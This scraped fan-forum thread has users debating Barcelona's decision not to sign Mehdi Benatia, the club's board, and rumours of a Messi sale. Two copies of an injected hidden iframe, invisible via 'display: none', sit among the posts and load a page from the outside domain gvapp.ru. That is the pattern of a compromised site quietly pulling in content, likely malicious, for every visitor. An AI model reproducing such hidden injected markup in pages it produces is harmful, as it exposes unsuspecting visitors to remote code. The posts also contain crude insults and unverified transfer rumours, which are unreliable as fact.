Mehdi Benatia

Bertus

Maybe the whiners are boring but so is the Barca Defense Task-force™ which appear swiftly to defend any and all decisions Barca make, contorting themselves in all kind of positions to create new narratives of why even Arteta is a valid player if Barca was to announce his signing today.

It's very simple. Benatia doesn't fit out defense and what the coaches want in a CB at Barca. That's the reason we didn't go for Benatia. Mathieu and Vermaelen are better fits than Benatia.

:lol:

Benatia can fit anywhere. Last year, his playstyle was in line with the one of TS first year at PSG. It's like saying TS doesn't fit barcelona. Yet they wanted TS.

Sid90

Messi was almost sold this summer to fund the new stadium. And that possibility for next summer is still real. And I wasn't even advocating for laporta to have more years. Just pointing out he had a more capable board of directors. Txiki build 2 CL winning teams, and look what he's doing to Man City. Zubi failed to sign a cb for years. We watched Messi, Iniesta, Xavi be wasted, as the team wasn't properly reinforced for years. This season they made an effort, and improved the team, but because we won nothing last season. I'm not sure we'd be seeing so many signings had la lliga be won. Tata would've probably stayed as well.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

The first statement were rumors, don't think Messi will be sold since the cost of renovating the old stadium would be funded by sponsors as told by the board. Tito's illness(extremely unfortunate) played a crucial role in us not winning the CL in 2012 if he didn't have the dreadful disease then we would have been competing for the CL in the coming years which didn't happen unfortunately.

Hamzah

High Definition Member
benatia is like puyol now? come on. he is a good modern centre back who played very well last year, but you're all acting like we missed out on beckenbauer.

SeloBarca

Not at all. And even if they were, he's not Puyol quality, thus he is not a good fit for the quality or lack thereof he bringe.

What Benatia are good at, is similiar to what Puyol was good at (no nonsense defending, airial ability, leadership etc). How good they are compared to eachother is debatable.

Bertus

What a load of nonsense.
I can compare him to TS since I watched them both playing last year every times I could.

What's nonsense are people like you saying he doesn't fit Barcelona but are not capable in any way to properly explain why.

Sorry but your excuse that he doesn't fit barcelona is a joke.

Hamzah

High Definition Member
Don't worry, the barca Defense Force will tell you Douglas does fit barcelona.

That "does fit or doesn't fit" must be one of the most retarded excusee ever.

you need players that fit the team and have the right quality. for example mathieu. would you want us to sign mandzukic for example? no because he is totally unsuited to our team. would you sign douglas? no because he is shit. you need both to make a good signing. eg rakitic, suarez, mathieu, ter stegen (pretty much all of our signings). the only debatable ones were TV and bravo but they have a chance to prove themselves.

there is no ''barca defense force'' and nobody wants to sign douglas.

F

Flavia

No chance was Messi ever getting sold to fund the stadium and it was never remotely close to happening.

You've missed some texts and tv shows from the catalan press, then. Some claim the "divorce" was set to happen, before the renewal was agreed upon. And of course it could be only rumors, but they were too frequent for my liking. Plus some of Messi's statements, and also the rumors of Tito convincing him before dying and such stuff.

<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Home of Barca Fans